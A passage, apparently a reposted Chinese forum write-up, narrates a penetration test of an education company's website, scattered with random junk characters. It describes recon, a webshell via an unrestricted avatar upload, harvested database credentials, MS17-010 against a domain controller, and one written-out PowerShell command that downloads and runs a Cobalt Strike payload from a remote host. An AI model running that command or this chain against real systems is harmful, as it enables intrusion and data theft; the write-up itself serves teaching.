, K$ r# K0 Q1 @ 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
5 i* }+ t, X4 h8 G & b! M% S# }) o1 y
8 c/ j; m. g: S: h$ R
' [9 p& [. j& M' Q8 x( o( g: D
, S: c3 P& T- f( s# u
& \$ Q k" P+ D. e* [5 r6 [8 c. Q 正文* y$ g8 ~6 ?& ?( J" a# L
$ a4 @, D* M9 m l. p
Z/ E- ?' ^* A
" e2 j! [8 X# H8 E
( w1 k$ Y3 Q; d$ J. f6 j0 j
9 Y8 H! f) }# W$ k# h 目标:www.xxxx.com(一家教育机构) 1 N8 y) ?' w; t& m& J
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能9 G* `$ y* F q/ C" u9 C# N
/ @( @% ~6 [% C1 [1 _3 r
3 D; f' Y i; l8 _4 a, ` - I+ `: }6 b3 t& X# T2 }
! `- W/ x, M; J2 `1 I3 v! U5 Q! Y- u1 g& r0 r7 ^
进行了简单的信息搜集 4 d; j( t5 ^0 F n$ u2 Y0 i) r
; A3 q g% d C8 T
( _/ o; c% t6 T0 Z$ {# k # F1 [9 K, U7 @( ]- X" _
, l& s n1 I; \ 子域名搜集
4 E5 ]0 {& h0 m
* G8 c8 y6 Y/ k! R4 \' N* }# t, q. t5 } c
% Z- J/ E" N. [5 ` D5 o 6 u0 a8 H) T: f* L; r, @7 @
4 |" ^. h3 h) Q7 Y8 t
fofa找资产 * }- a9 {8 J( X" s8 x S9 p
, }, x0 q' S' U, o6 Z4 K
3 r6 ~" `) }+ P% Y* c- ?' e: d " y* a3 B' R/ [, ]
$ ~( u1 G' S |( h4 @) ~3 r' C: o
* ]+ ]5 Q" ]0 A# Z. ~
0 \0 ~: c4 x4 J% J
/ h4 A. O* D" {+ } 一共七个资产。去重之后只有两个。 * ~0 e+ h( X Q" q# M- R( J2 g. J
w0 L9 x; P+ s0 I0 e
) L4 M3 g& S1 \( r
. l) A* f8 X4 D2 V, m& f# x$ k0 i3 V1 q! T9 a e& {" p
目录探测+ z8 J! ]5 F/ `) t* C
: n& _1 N9 j+ k' \ q8 N6 o& p' {" ?* A+ Y! L
9 b$ F0 ^7 ~. M6 F+ g8 \
v1 o% C' y% y! r' O& c
/ u$ v+ A+ W& P0 h
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
7 S- t+ t4 Q$ N6 x- L- e 7 B8 V4 _! y4 u! ] T% Y- p9 ^
9 ?, W" r, N# H& y7 [& ~; K" s P, ~3 k) h* H9 E& F: Z9 w! t& ?
7 R* }/ Q4 Y1 p
我又尝试了通过修改返回包来绕过登录界面7 ?2 [4 n, H( S4 r% X/ E$ t# E: ?
% n6 s! O9 a7 r5 H& f
* b* k4 k) M8 d! n3 R
2 C' r+ J: n0 D( _1 ?8 O) Y% Q0 X $ T" x9 w$ w' ]; l
( F3 L( n: q4 w) G: u# ~) [; r& _ 还是不行,尝试注入无果
& F0 T; a* U) x* I5 q 8 J, ]) K) @' {: W2 K3 S6 }
+ _& Q" ^! @# S3 J5 K6 u
* C. A, O5 b7 [# O+ K2 H x7 T
& r1 T. ^; ]% }% f/ O9 {
& N# o5 L8 ]$ R* ~ O4 ^ 不过我目录探测出了一处Spring信息泄露 8 x6 W( x; ?: m1 o
q% P1 ]; i, H* F9 A. x! b5 ~; P* L: W( X
0 ?0 q, `: }9 S1 M9 j+ N- g& x% z. M K- r. m! Z$ i* B
% f9 ]) K6 G7 t# _9 M/ V
! F; g; u; e, X6 v/ F" B. C" P) ^+ |1 p% v- ?/ Y) c
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录( x" `! V8 O( Q9 ~- r; ^' |' P, F
- F% s' p, Y3 V4 e+ H0 q; f& M
& l' D4 n0 y2 V" x
) B7 J# j( ]1 o3 o
; H- g# g5 h, P% U1 M( `; t; W1 u- F
* I3 C9 h+ r, M p2 R1 k# r 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。# A9 H' T& d6 l8 C
% ~) [2 X7 I) c3 z6 e4 Z' r
% U5 ~) W \9 _/ m8 {0 _8 L. ]4 N
! c' M9 s! k; Z: K7 L 5 ]$ ~) O( B0 S- q6 ~0 G
3 v2 y0 B7 l* \7 |$ q* t/ U! d 获取有些师傅到这一步就手机抓包电脑测了。
0 u- o& S0 w6 `; K; q , q7 h+ X; |5 Y' i2 E& G8 _
7 N% Y$ X: u1 ? Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。: P/ I/ a+ S# N9 n d+ O% c
# |( \! y/ w% J8 f- q5 g# g- X' r
9 N& p) T2 D% o 其中在一个公众号发现了小程序,可以进行注册。
& c7 l' ~; ]- k9 g/ d
: H: y- s, e0 E4 A
" S: {, E5 b8 H! ~% r/ o+ v, K 看到了头像上传,尝试上传获取WebShell3 x7 T$ P8 f# w# `4 Z1 Q/ ]
3 A% X) o7 |3 w) Z5 @4 Z! J _- ~
1 d- H. V1 m9 y5 ^+ x# d
8 y8 o5 T1 A% L. l! h p4 k0 s
! `. `- q6 F, u$ B# _ M
5 t# B) T' _: n 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
1 X4 y. P6 |9 V) V/ ]4 h" h1 ]
$ B4 I1 J4 c4 t X
$ d% a/ X m/ Z + j4 F; N# w) z& n- a
: y& B$ I; z( E. {
! ]+ q( X6 R, z' f F 然后上了大马- }" p4 [+ M9 o5 w+ K
5 X% z# q- M% S) ]
/ T! k1 n8 e" c) m / d4 L, a$ e% a4 g, q0 R
9 a0 d% c! K( l I4 T& X( j7 k$ h
3 U! u" g) G+ g- U$ ]) J+ F( ?, ?2 K
! A9 ?( V4 l8 M+ k 4 r9 Z6 L: r6 Q4 H4 ~! P6 q
" |6 Q4 X6 |% n" u) K9 A9 f: C, f
通过翻找文件发现数据库账号密码1 v d* }. ?6 W' c" a/ `5 S
8 X- f8 o G# r" E$ d
) s2 H; {' m4 g* {4 H4 s( V8 e * }8 H# e! e- x. @
7 V* O& w C, j
8 B' D/ E+ u5 } r$ o --内网渗透. K# S7 b& T- a3 Y: f* T( k3 W1 ]: B* W
" C9 A& w+ _" _3 Z9 p, f
8 H l# v$ z/ F3 S6 x9 y 直接通过powershell执行 cs上线& R# n6 z* @% i9 w. H2 m2 t6 H" B
* l: X6 }8 g& Q) k3 S B* m/ m; y/ X* a/ M. m+ J! N& Y5 ?
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
, A) K6 Z$ ~% H! |4 g! ]% z
! Q/ E! O) }5 O
) H/ n0 C* @5 X7 {3 j. j& W D0 n 5 f- Z4 y1 Y# k+ Z3 F7 `+ e
" D; v. u1 D' o3 F& b5 X
6 A8 x' ^5 }, o* I _" o 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破4 a7 X7 `: ?2 v A$ c* ~
" C5 c% M2 U; T- x
. c5 ]( w. M, M# O
' B; K9 e$ h* Z" S0 @' \; b9 O, n $ L5 G2 a$ Z" Z. Q P4 X# f$ n* v
) ] J/ e9 |, l- w; M 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
4 G1 ]% u9 L! W7 P# {9 u
$ d( B; Q3 i0 I T, R: k, A. G: j
, ^+ `4 S4 V; i- K7 Q1 Q; n; ]0 j4 H; o @5 ~" |, Z! u6 E8 s
5 q+ c0 H3 j$ f& i, v8 d4 B; Z; e
* x1 w* k; ^. g- A
/ m" s# f7 E3 q9 x) n5 @2 j
* Q9 {) R- j' v0 L# P7 a: D9 A" U3 ~5 S# W' S/ L$ C
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 7 S8 O0 N( f, }5 o0 [3 o: E6 r
# K! F E( _, x8 @6 Z- e0 g9 T/ q8 \/ v+ S( K9 c/ A
7 Y. h7 O5 R0 M' J) ^
2 d0 J& d" R* }: ?
" R v2 s, j9 p5 a' o/ F2 o
: q6 H3 Q& Q+ v! a6 |! n* j0 J0 t3 M* J9 Q: \- z
$ e! ?+ I% \1 ^( l
7 b4 x4 }2 O$ |9 k% w: s5 O2 _
1 A& y6 N" f& {, L K
, R& ] [# a8 j* w3 Y7 f7 }0 K
) y+ }, K! S9 d/ C$ J" {, Q- Y; ]
* b+ g! ~: H1 q; r ( g% I% v- t: W; g3 h% p, B; ^
4 }1 n* ^3 V2 \+ j
小结( T* j n6 z, y9 W4 |' s# P7 y& V
7 B8 r4 Z) G# _: g- O. R' I7 l
- _1 J: }- ?/ J3 P7 ?+ ?
" Z6 _8 d4 a6 Q" [ 8 k K/ I( ]# ?
: d/ J2 @7 H ?0 E! Z; ]5 y: ^
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
8 o: I: J! S4 C; u6 J4 n+ x% { - P9 }& ]' Q, I9 w" J7 w: x
5 t+ y2 A3 J- u" v, f
8 f8 g9 M! F9 ?- E4 y Y
- f( B: n6 [& |% f- i6 O
& D( \/ H' }* ^* N; k& `9 p5 \ -
3 v" T2 f7 ^6 t, f / ]; l) K$ B1 S+ T& Z7 @
2 P; Z$ w, f+ B9 B( h - . I0 {4 ^6 j( B0 j+ p
9 a; R* {1 }0 W% o/ c
; M& h" ]- u2 B+ J 1 W @% N( f9 u! n& t, H
, X* L$ P9 G+ |% u% `% G9 ~7 A 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
9 u5 X! Z( z" Q! j6 A; v
7 z9 @3 r+ z; q3 P6 D- P4 }& y. Z' ]. X- v% e: g3 c
5 L5 i9 |8 D2 D% h( K H; N! M
|